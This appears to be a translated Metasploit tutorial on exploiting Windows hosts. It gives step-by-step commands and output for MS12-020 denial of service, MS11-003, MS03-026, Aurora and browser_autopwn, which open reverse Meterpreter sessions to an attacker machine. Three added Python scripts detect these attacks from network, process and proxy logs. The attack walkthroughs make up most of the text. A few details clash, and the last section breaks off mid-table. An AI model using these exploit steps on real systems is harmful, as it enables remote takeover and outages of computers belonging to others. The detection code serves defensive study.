Metasploit Penetration Testing: Exploiting Vulnerabilities in Windows Systems

Microsoft Windows XP;
Microsoft Windows Vista;
Microsoft Windows Server 2008;
Microsoft Windows Server 2003;
Microsoft Windows 7.

The following demonstrates exploiting this vulnerability against Windows XP SP1. The target host's IP address is 192.168.1.106. The steps are as follows:

Matching Modules
================

   Name                                              Disclosure Date  Rank    Check  Description
   ----                                              ---------------  ----    -----  -----------
   auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2019-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS
   auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker

The output shows two modules matching this vulnerability. The first causes a denial of service on the target; the second only scans for and checks the vulnerability. The first module is therefore chosen for the attack.

2) Select the exploit module and view its configuration options:

msf5 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3389             yes       The target port (TCP)

The output shows that the module has two options. The target port is already set by default, so only the RHOSTS option remains to be configured to specify the target.

3) Configure the options of the dos/windows/rdp/ms12_020_maxchannelids module:

msf5 auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.106
RHOSTS => 192.168.1.106

4) Launch the attack:

msf5 auxiliary(ms12_020_maxchannelids) > exploit

[*] 192.168.1.106:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.106:3389 - 210 bytes sent
[*] 192.168.1.106:3389 - Checking RDP status...
[+] 192.168.1.106:3389 seems down
[*] Auxiliary module execution completed

The output shows that the attack against the target host was launched. At this point the target host blue-screens and then reboots automatically, as shown in Figure 1.

Figure 1 The target host blue-screens

5) The blue screen on the target host shows that the denial-of-service attack against it succeeded.

Exploiting MS11-003 against a Windows 7 target host. The steps are as follows:

1) Look up the full path of the module for MS11-003:

msf5 > search MS11-003

Matching Modules
================

   Name                                            Disclosure Date  Rank  Check  Description
   ----                                            ---------------  ----  -----  -----------
   exploit/windows/browser/ms11_003_ie_css_import  2019-11-29       good  No     MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free

The output shows that the module for exploiting MS11-003 is windows/browser/ms11_003_ie_css_import.

2) Use the windows/browser/ms11_003_ie_css_import module and view its options:

msf5 > use exploit/windows/browser/ms11_003_ie_css_import
msf5 exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  true             no        Enable Java obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

The output lists all of the module's options. Next, set SRVHOST to specify the address to listen on.

3) Configure the SRVHOST option:

msf5 exploit(ms11_003_ie_css_import) > set SRVHOST 192.168.1.105

SRVHOST => 192.168.1.105

4) Launch the attack:

msf5 exploit(ms11_003_ie_css_import) > exploit

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.105:4444

[*] Using URL: http://192.168.1.105:8080/uvCjRD

[*] Server started.

The output above shows that the exploit server has started. As soon as the target host opens http://192.168.1.105:8080/uvCjRD in its browser, it is exploited and automatically establishes a Meterpreter session back to the attacking host, as follows:

msf5 exploit(ms11_003_ie_css_import) > [*] Received request for "/uvCjRD"
[*] Sending redirect
[*] Received request for "/uvCjRD/BTbkA6a.html"
[*] Sending HTML
[*] Sending .NET DLL
[*] Received request for "/uvCjRD/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] Sending CSS
[*] Meterpreter session 1 opened (192.168.1.105:4444 -> 192.168.1.103:50047) at 2019-05-07 14:01:01 +0800
[*] Session ID 1 (192.168.1.105:4444 -> 192.168.1.103:50047) processing InitialAutoRun 'migrate -f'
[*] Current server process: iexplore.exe (5704)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4880
[*] Received request for "/uvCjRD/BTbkA6a.html"
[*] Sending HTML
[*] Sending .NET DLL
[+] Successfully migrated to process
[*] Meterpreter session 2 opened (192.168.1.105:4444 -> 192.168.1.103:50051) at 2019-05-07 14:01:12 +0800
[*] Session ID 2 (192.168.1.105:4444 -> 192.168.1.103:50051) processing InitialAutoRun 'migrate -f'
[*] Current server process: iexplore.exe (5740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6052
[*] Sending .NET DLL
[+] Successfully migrated to process
[*] Meterpreter session 3 opened (192.168.1.105:4444 -> 192.168.1.103:50053) at 2019-05-07 14:01:21 +0800
[*] Session ID 3 (192.168.1.105:4444 -> 192.168.1.103:50053) processing InitialAutoRun 'migrate -f'
[*] Current server process: iexplore.exe (1888)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4180
[+] Successfully migrated to process

The output shows three Meterpreter sessions established between the attacking host and the target. To confirm that the three sessions exist, run the sessions command:

msf5 exploit(ms11_003_ie_css_import) > sessions

Active sessions
===============

  Id  Type                   Information                                    Connection
  --  ----                   -----------                                    ----------
  1   meterpreter x86/win32  WIN-RKPKQFBLG6C\Administrator @ WIN-RKPKQFBLG6C  192.168.1.105:4444 -> 192.168.1.103:50047 (192.168.1.103)
  2   meterpreter x86/win32  WIN-RKPKQFBLG6C\Administrator @ WIN-RKPKQFBLG6C  192.168.1.105:4444 -> 192.168.1.103:50051 (192.168.1.103)
  3   meterpreter x86/win32  WIN-RKPKQFBLG6C\Administrator @ WIN-RKPKQFBLG6C  192.168.1.105:4444 -> 192.168.1.103:50053 (192.168.1.103)

The output lists the established sessions. Any one of them can be activated with sessions -i in order to continue the penetration test against the target host. For example, to activate the first session:

msf5 exploit(ms11_003_ie_css_import) > sessions -i 1

[*] Starting interaction with 1…

meterpreter >

The meterpreter > prompt shows that the first Meterpreter session was opened successfully, and any Meterpreter command or script can now be run. For example, to view the platform the system runs on:

meterpreter > sysinfo
Computer        : WIN-RKPKQFBLG6C                          # computer name
OS              : Windows 7 (Build 7601, Service Pack 1).  # operating system
Architecture    : x86                                      # architecture
System Language : zh_CN                                    # system language
Domain          : WORKGROUP                                # domain
Logged On Users : 4                                        # number of logged-on users
Meterpreter     : x86/win32

The output shows the target host's computer name, operating system version, architecture, language and other details.

MS03-026 is the Microsoft DCOM RPC interface long hostname remote buffer overflow. An attacker can exploit it remotely and without authentication by reaching the target's RPC service port, executing arbitrary instructions with SYSTEM privileges and gaining complete control of the system. The following describes how this vulnerability is exploited against a target host.

The following demonstrates exploiting MS03-026 against a Windows 2000 SP4 target host. The steps are as follows:

Matching Modules
================

   Name                                  Disclosure Date  Rank   Check  Description
   ----                                  ---------------  ----   -----  -----------
   exploit/windows/dcerpc/ms03_026_dcom  2003-07-16       great  No     MS03-026 Microsoft RPC DCOM Interface Overflow

2) Use the windows/dcerpc/ms03_026_dcom exploit module and view its options:

msf5 > use exploit/windows/dcerpc/ms03_026_dcom
msf5 exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   135              yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

The output shows that a target address option must be configured.

3) Configure the RHOSTS option:

msf5 exploit(ms03_026_dcom) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103

4) Launch the exploit:

msf5 exploit(ms03_026_dcom) > exploit

[*] Started reverse TCP handler on 192.168.1.108:4444

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.103[135] …

[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.1.103[135] …

[*] Sending exploit …

[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.103:1029) at 2017-05-07 17:43:27 +0800

meterpreter >

The output shows that a Meterpreter session was established, which means the attack on the target host succeeded.
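The bind-then-callback sequence in this output is also what a defender can watch for at the network edge: an inbound connection to TCP/135 on the server, followed seconds later by the server itself opening a connection back to that same peer, as happens here when the payload connects to the handler on 4444. The following Python is an added example, not from the book or from Metasploit; the flow record format and the sample records are constructed.

```python
# Added example (not from the book): pair an inbound connection to the RPC
# endpoint mapper (TCP/135) with a connection initiated *by the server* back
# to the same peer shortly afterwards. Normal DCOM clients only ever connect
# towards the server (first 135, then a dynamic port); the server calls nobody.
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int

def parse_flows(lines):
    """Parse constructed flow records: '<ISO timestamp> src:sport -> dst:dport'."""
    flows = []
    for line in lines:
        ts, left, _, right = line.split()
        src, sport = left.rsplit(":", 1)
        dst, dport = right.rsplit(":", 1)
        flows.append(Flow(datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return sorted(flows, key=lambda f: f.ts)

def find_rpc_callbacks(flows, server, window=timedelta(seconds=30)):
    """Return (peer, callback_port) for each peer that connected to server:135
    and then received a new connection *from* the server within `window`.
    The callback port is where a reverse-connect payload would be listening."""
    hits = []
    for rpc in (f for f in flows if f.dst == server and f.dport == 135):
        for f in flows:
            if (f.src == server and f.dst == rpc.src
                    and rpc.ts <= f.ts <= rpc.ts + window):
                hits.append((rpc.src, f.dport))
                break
    return hits

# Constructed sample: one benign DCOM client (.60) and the exploit session (.108).
SAMPLE_FLOWS = """\
2017-05-07T17:43:10 192.168.1.50:49201 -> 192.168.1.103:445
2017-05-07T17:43:20 192.168.1.108:39872 -> 192.168.1.103:135
2017-05-07T17:43:27 192.168.1.103:1029 -> 192.168.1.108:4444
2017-05-07T17:44:00 192.168.1.60:50012 -> 192.168.1.103:135
2017-05-07T17:44:01 192.168.1.60:50013 -> 192.168.1.103:49153
2017-05-07T17:50:00 192.168.1.103:50200 -> 192.168.1.60:445
""".splitlines()
print(find_rpc_callbacks(parse_flows(SAMPLE_FLOWS), "192.168.1.103"))  # [('192.168.1.108', 4444)]
```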

4. Exploiting the Aurora vulnerability in Internet Explorer

A penetration tester can use the Aurora vulnerability to plant malicious code in a web page (a drive-by download) and thereby compromise the target host. The vulnerability exists in IE 6/7/8, on Windows 2000 SP4, Windows XP/2003/Vista/2008 and Windows 7. The following describes how it is exploited.

The following demonstrates exploiting the Aurora vulnerability in IE against a Windows XP target host. The steps are as follows:

1) Select the exploit module for the Aurora vulnerability, windows/browser/ms10_002_aurora:

msf5 > use exploit/windows/browser/ms10_002_aurora
msf5 exploit(ms10_002_aurora) >

2) Select the payload and view the module's options:

msf5 exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Configure the required options according to the output above.

3) Configure the options:

msf5 exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf5 exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf5 exploit(ms10_002_aurora) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf5 exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443

4) Launch the attack:

msf5 exploit(ms10_002_aurora) > exploit

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.108:443

msf5 exploit(ms10_002_aurora) > [*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.108:80/

[*] Server started.

The output above shows that the attack server has started. As soon as the target host opens http://192.168.1.108:80/ in IE, it is exploited. On success the following appears:

[*] 192.168.1.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Meterpreter session 1 opened (192.168.1.108:443 -> 192.168.1.106:1175) at 2019-05-07 14:10:42 +0800

The output shows that a Meterpreter session was opened. The target host's memory consumption is now extremely high, as shown in Figure 2.

Figure 2 Memory usage

5) Migrating to another process brings the target host's memory consumption back to normal:

meterpreter > run migrate -f

[*] Current server process: iexplore.exe (420)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 888

[+] Successfully migrated to process

The output shows that the process was migrated successfully. On the target host, IE has closed and memory consumption is back to normal.
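The migration shown here (and in the MS11-003 output earlier) leaves a distinctive trace on the endpoint: the browser spawns notepad.exe, and notepad.exe then opens a network connection, which it never needs to do. The following Python is an added example, not from the book; the event record format and the sample events are constructed (Sysmon process-create and network-connect events, IDs 1 and 3, carry the same fields).

```python
# Added example (not from the book): flag a program that never needs a socket
# (notepad.exe) opening a network connection, and report which process spawned
# it. A browser parent plus an outbound connection from notepad.exe is exactly
# what the 'migrate -f' step in the output above produces on the target.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
NO_NETWORK_EXPECTED = {"notepad.exe"}   # programs with no legitimate network use

def parse_events(lines):
    """Constructed telemetry: 'ts|kind|pid|image|parent_image|remote', where kind
    is PROC (process created; remote is '-') or NET (outbound connection; remote
    is 'ip:port' and parent_image is '-')."""
    events = []
    for line in lines:
        ts, kind, pid, image, parent, remote = line.split("|")
        events.append({"ts": ts, "kind": kind, "pid": int(pid),
                       "image": image.lower(), "parent": parent.lower(),
                       "remote": remote})
    return events

def detect_migration(events):
    """Return (pid, image, parent, remote) for every NET event of a process in
    NO_NETWORK_EXPECTED. The parent (from its PROC event) shows whether a
    browser created it; 'unknown' if the creation was not observed."""
    parent_of = {}
    alerts = []
    for e in events:
        if e["kind"] == "PROC":
            parent_of[e["pid"]] = e["parent"]
        elif e["kind"] == "NET" and e["image"] in NO_NETWORK_EXPECTED:
            alerts.append((e["pid"], e["image"],
                           parent_of.get(e["pid"], "unknown"), e["remote"]))
    return alerts

# Constructed sample from the Windows XP target in the Aurora walk-through.
SAMPLE_EVENTS = """\
2019-05-07T14:10:40|PROC|420|iexplore.exe|explorer.exe|-
2019-05-07T14:10:41|NET|420|iexplore.exe|-|192.168.1.108:80
2019-05-07T14:10:42|NET|420|iexplore.exe|-|192.168.1.108:443
2019-05-07T14:10:50|PROC|888|notepad.exe|iexplore.exe|-
2019-05-07T14:10:51|NET|888|notepad.exe|-|192.168.1.108:443
2019-05-07T14:12:00|PROC|1300|notepad.exe|explorer.exe|-
""".splitlines()
print(detect_migration(parse_events(SAMPLE_EVENTS)))
```

The browser's own connections to ports 80 and 443 are not flagged, since browsers talk to web servers all day; the second notepad.exe, started by the user from explorer.exe and never touching the network, is not flagged either.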

5. The browser autopwn module

Metasploit provides an automatic browser attack module, browser_autopwn. When a user visits its web page, the module automatically attacks the target host's browser. Before launching exploits, browser_autopwn detects which browser the user is running; that is, the module targets only the IE browser. browser_autopwn then deploys the most suitable exploit based on the detection result. The following describes how to use browser_autopwn for automatic browser attacks.

Using browser_autopwn against a target host (Windows XP with IE6). The steps are as follows:

1) Search for the full path of the browser_autopwn module:

msf5 > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Check  Description
   ----                               ---------------  ----    -----  -----------
   auxiliary/server/browser_autopwn                    normal  No     HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2019-07-05       normal  No     HTTP Client Automatic Exploiter 2 (Browser Autopwn)

The output shows the full path of the browser_autopwn module; its description shows that it is an automatic exploiter for HTTP clients, i.e. browsers.

2) Select the module and load the payload:

msf5 > use auxiliary/server/browser_autopwn

msf5 auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

3) View and configure the module's options:

msf5 auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf5 auxiliary(browser_autopwn) > set LHOST 192.168.1.108   # address of the attacking host
LHOST => 192.168.1.108
msf5 auxiliary(browser_autopwn) > set URIPATH /             # URI path served by the exploit
URIPATH => /

The steps above configure the LHOST and URIPATH options.

4) Launch the attack:

msf5 auxiliary(browser_autopwn) > exploit

After launching, a large amount of output is printed, as follows:

[*] Auxiliary module execution completed

[*] Setup

msf5 auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.1.108…

[*] —

[*] Starting exploit android/browser/webview_addjavainterface with payload android/meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:8080/gCMrIGi

[*] Local IP: http://192.168.1.108:8080/gCMrIGi

[*] Server started.

[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/JnJExAKYwwPAw

[*] Local IP: http://192.168.1.108:8080/JnJExAKYwwPAw

[*] Server started.

[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/mTpzYbu

[*] Local IP: http://192.168.1.108:8080/mTpzYbu

[*] Server started.

[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/oKZGDjanNKjIG

[*] Local IP: http://192.168.1.108:8080/oKZGDjanNKjIG

[*] Server started.

[*] Starting handler for java/meterpreter/reverse_tcp on port 7777

[*] Started reverse TCP handler on 192.168.1.108:6666

[*] Started reverse TCP handler on 192.168.1.108:7777

[*] Starting the payload handler…

[*] Starting the payload handler…

For reasons of space, the middle part of the output is omitted. When the following appears at the end, the exploit servers have finished starting:

[*] — Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.108:8080/

[*] Server started.

The output shows that Metasploit has set up a fake website at http://192.168.1.108:8080/. When a user visits that URL, the browser_autopwn module attempts to connect to the user's host and establish a remote session, as follows:

[*] 192.168.1.109 java_jre17_jmxbean – handling request for /cSihqoYuL/MHeldoAg.jar

[*] 192.168.1.109 java_atomicreferencearray – Sending jar

[*] Meterpreter session 1 opened (192.168.1.108:7777 -> 192.168.1.109:1088) at 2019-05-07 15:47:31 +0800

[*] Sending stage (45718 bytes) to 192.168.1.109

[*] Meterpreter session 2 opened (192.168.1.108:7777 -> 192.168.1.109:1093) at 2019-05-07 15:47:31 +0800

[*] Session ID 1 (192.168.1.108:7777 -> 192.168.1.109:1088) processing InitialAutoRun 'migrate -f'

[*] 192.168.1.109 java_jre17_jmxbean – handling request for /cSihqoYuL/MHeldoAg.jar

[*] Session ID 2 (192.168.1.108:7777 -> 192.168.1.109:1093) processing InitialAutoRun 'migrate -f'

[*] Sending stage (45718 bytes) to 192.168.1.109

[*] Session ID 4 (192.168.1.108:7777 -> 192.168.1.109:1112) processing InitialAutoRun 'migrate -f'
[*] Session ID 5 (192.168.1.108:3333 -> 192.168.1.109:1115) processing InitialAutoRun 'migrate -f'

[*] Meterpreter session 6 opened (192.168.1.108:3333 -> 192.168.1.109:1121) at 2019-05-07 15:47:41 +0800

[*] Current server process: efgtslDysTpBSDF.exe (2512)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 3092

[*] Sending stage (45718 bytes) to 192.168.1.109

[*] Meterpreter session 7 opened (192.168.1.108:7777 -> 192.168.1.109:1132) at 2019-05-07 15:47:43 +0800

[*] Session ID 6 (192.168.1.108:3333 -> 192.168.1.109:1121) processing InitialAutoRun 'migrate -f'
[*] Session ID 7 (192.168.1.108:7777 -> 192.168.1.109:1132) processing InitialAutoRun 'migrate -f'
[*] Current server process: oMmhXajpVLwu.exe (2636)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 3208

[+] Successfully migrated to process

[+] Successfully migrated to process

The output above shows browser_autopwn attempting to establish remote connections to the target host. The last line indicates that process migration succeeded. Next, use the sessions command to view or activate the Meterpreter sessions:

msf5 auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter java/java  Test @ aa-886okjm26fsw                  192.168.1.108:7777 -> 192.168.1.109:1088 (192.168.1.109)
  2   meterpreter java/java  Test @ aa-886okjm26fsw                  192.168.1.108:7777 -> 192.168.1.109:1093 (192.168.1.109)
  3   meterpreter java/java  Test @ aa-886okjm26fsw                  192.168.1.108:7777 -> 192.168.1.109:1104 (192.168.1.109)
  4   meterpreter java/java  Test @ aa-886okjm26fsw                  192.168.1.108:7777 -> 192.168.1.109:1112 (192.168.1.109)
  5   meterpreter x86/win32  AA-886OKJM26FSW\Test @ AA-886OKJM26FSW  192.168.1.108:3333 -> 192.168.1.109:1115 (192.168.1.109)
  6   meterpreter x86/win32  AA-886OKJM26FSW\Test @ AA-886OKJM26FSW  192.168.1.108:3333 -> 192.168.1.109:1121 (192.168.1.109)
  7   meterpreter java/java  Test @ aa-886okjm26fsw                  192.168.1.108:7777 ->
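Seen from a web proxy, the drive-by sequences in this section, in the MS11-003 walk-through and in the Aurora walk-through share two signals: a request path made of raw non-ASCII bytes (the "Sending CSS" request for /uvCjRD/\xEE\x80\xA0... above) and an HTML page followed within seconds by an executable object (.NET DLL, .jar) from the same server to the same client. The following Python is an added example, not from the book; the proxy log format, the .dll file name and the sample lines are constructed.

```python
# Added example (not from the book): two detections over constructed proxy log
# lines. (1) a percent-decoded path containing bytes >= 0x80; (2) the same
# server sending a client text/html and then a binary object within a minute.
from datetime import datetime, timedelta
from urllib.parse import unquote_to_bytes, urlsplit

BINARY_TYPES = {"application/octet-stream", "application/x-msdownload",
                "application/java-archive", "application/x-java-archive"}

def parse_proxy_log(lines):
    """Constructed fields: '<ISO timestamp> client url status content-type'."""
    rows = []
    for line in lines:
        ts, client, url, _status, ctype = line.split()
        u = urlsplit(url)
        rows.append({"ts": datetime.fromisoformat(ts), "client": client,
                     "server": u.netloc, "path": u.path, "ctype": ctype})
    return rows

def non_ascii_path(path):
    """True if the percent-decoded path contains any byte >= 0x80."""
    return any(b >= 0x80 for b in unquote_to_bytes(path))

def detect_driveby(rows, window=timedelta(seconds=60)):
    """Return (client, server, reason) for each suspicious client/server pair."""
    alerts, by_pair = [], {}
    for r in rows:
        by_pair.setdefault((r["client"], r["server"]), []).append(r)
    for (client, server), reqs in by_pair.items():
        reqs.sort(key=lambda r: r["ts"])
        if any(non_ascii_path(r["path"]) for r in reqs):
            alerts.append((client, server, "non-ascii path"))
        html_ts = [r["ts"] for r in reqs if r["ctype"] == "text/html"]
        for r in reqs:
            if r["ctype"] in BINARY_TYPES and any(
                    timedelta(0) <= r["ts"] - t <= window for t in html_ts):
                alerts.append((client, server, "html then binary"))
                break
    return alerts

# Constructed sample: the MS11-003 sequence, then an unrelated intranet download.
SAMPLE_LOG = """\
2019-05-07T14:00:58 192.168.1.103 http://192.168.1.105:8080/uvCjRD 302 text/html
2019-05-07T14:00:59 192.168.1.103 http://192.168.1.105:8080/uvCjRD/BTbkA6a.html 200 text/html
2019-05-07T14:01:00 192.168.1.103 http://192.168.1.105:8080/uvCjRD/BTbkA6a.dll 200 application/octet-stream
2019-05-07T14:01:00 192.168.1.103 http://192.168.1.105:8080/uvCjRD/%EE%80%A0%E1%81%9A 200 text/css
2019-05-07T14:05:00 192.168.1.103 http://intranet.example/index.html 200 text/html
2019-05-07T14:20:00 192.168.1.103 http://intranet.example/tool.dll 200 application/octet-stream
""".splitlines()
```

The intranet pair is not flagged because fifteen minutes separate its HTML page from its DLL; lowering `window` trades that quiet for more noise.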
